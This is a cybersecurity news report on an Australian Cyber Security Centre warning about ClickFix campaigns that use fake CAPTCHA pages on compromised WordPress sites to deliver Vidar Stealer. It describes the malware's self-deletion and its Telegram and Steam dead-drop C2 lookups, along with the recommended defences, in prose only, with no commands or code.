Australia’s Cyber Security Centre issued a formal warning, alerting domestic organizations to active ClickFix social-engineering campaigns delivering Vidar Stealer — an information-stealing malware capable of extracting browser credentials, session cookies, and cryptocurrency wallet data before self-deleting its disk presence and continuing to run from memory.
Compromised WordPress Sites Redirect Victims to Fake Cloudflare and CAPTCHA Verification Pages
The ACSC alert describes an attack chain that begins when a user visits a compromised WordPress website. The site silently redirects the visitor to a page displaying a counterfeit Cloudflare browser verification notice or a fake CAPTCHA prompt. Rather than completing an automated check, the page instructs the user to manually open a Windows Run dialog or PowerShell terminal and execute a command shown on screen. Complying with the instruction downloads and runs the Vidar Stealer payload.
The ClickFix technique exploits users’ familiarity with browser verification flows that appear on legitimate sites across the commercial web. Because the payload is ultimately delivered through deliberate user action rather than a drive-by exploit chain, the attack bypasses browser-based exploit mitigations and evades endpoint detection tools tuned to recognize automated download patterns. The friction of “human completes the step” is what makes this attack vector effective against technical users who might otherwise be alert to suspicious browser activity.
What Vidar Stealer Extracts and How It Erases Evidence of Its Presence
After execution, Vidar Stealer targets browser-stored passwords, active session cookies, autofill records, cryptocurrency wallet files, and system configuration details useful for follow-on targeting. It then deletes its own on-disk executable, removing the primary artifact that scheduled endpoint scans or alert-triggered reviews would detect. The malware transitions to memory-only operation after self-deletion.
The practical consequence for incident responders is significant: investigators who examine an affected machine may find no malware files, potentially clearing the system as uninfected while an active implant continues operating in a running process. Organizations that detect Vidar Stealer infections should treat all browser-stored credentials from the affected machine as compromised and initiate full credential rotation across associated accounts and services, regardless of whether on-disk evidence is present.
Dead-Drop C2 Resolution Through Telegram Channels and Steam Profile Pages
Vidar Stealer does not communicate with a fixed command-and-control server. Instead, it retrieves the address of its active C2 infrastructure by reading attacker-controlled accounts on Telegram channels and Steam profile pages. This dead-drop resolver technique allows operators to update their C2 endpoint by modifying a public post without recompiling or redeploying the malware binary.
The approach creates a network-level detection problem: blocking Vidar Stealer’s C2 resolution requires blocking Telegram or Steam, both of which carry legitimate operational use in enterprise and government environments. The technique closely parallels the Zulip API abuse documented in the ZiChatBot PyPI supply-chain campaign disclosed on the same day, pointing to broad adoption of legitimate platform abuse as a standard evasion layer among current information-stealing malware operators.
ACSC-Recommended Countermeasures and Defensive Limitations
The ACSC alert outlined three primary defensive measures: restricting PowerShell execution policies to prevent unsigned or user-supplied scripts from running; deploying application allow-listing to block unauthorized executables regardless of how they are delivered; and ensuring all WordPress installations are fully patched against the vulnerabilities attackers use to plant malicious redirect code on compromised sites.
The center emphasized that ClickFix campaigns depend entirely on persuading a user to execute a command they did not initiate. User awareness training is therefore a meaningful defensive layer — organizations should ensure staff understand that no legitimate browser verification service, CAPTCHA provider, or web portal will instruct users to open a terminal and run commands manually.
Australian infrastructure-sector organizations were specifically named among those targeted in the current campaign wave, though Vidar Stealer campaigns operate globally and have previously struck financial services, healthcare, and technology organizations. The combination of self-deletion, in-memory residency, and dead-drop C2 resolution substantially increases the cost and complexity of post-infection forensic investigation compared with conventional information-stealing malware that maintains an on-disk presence.
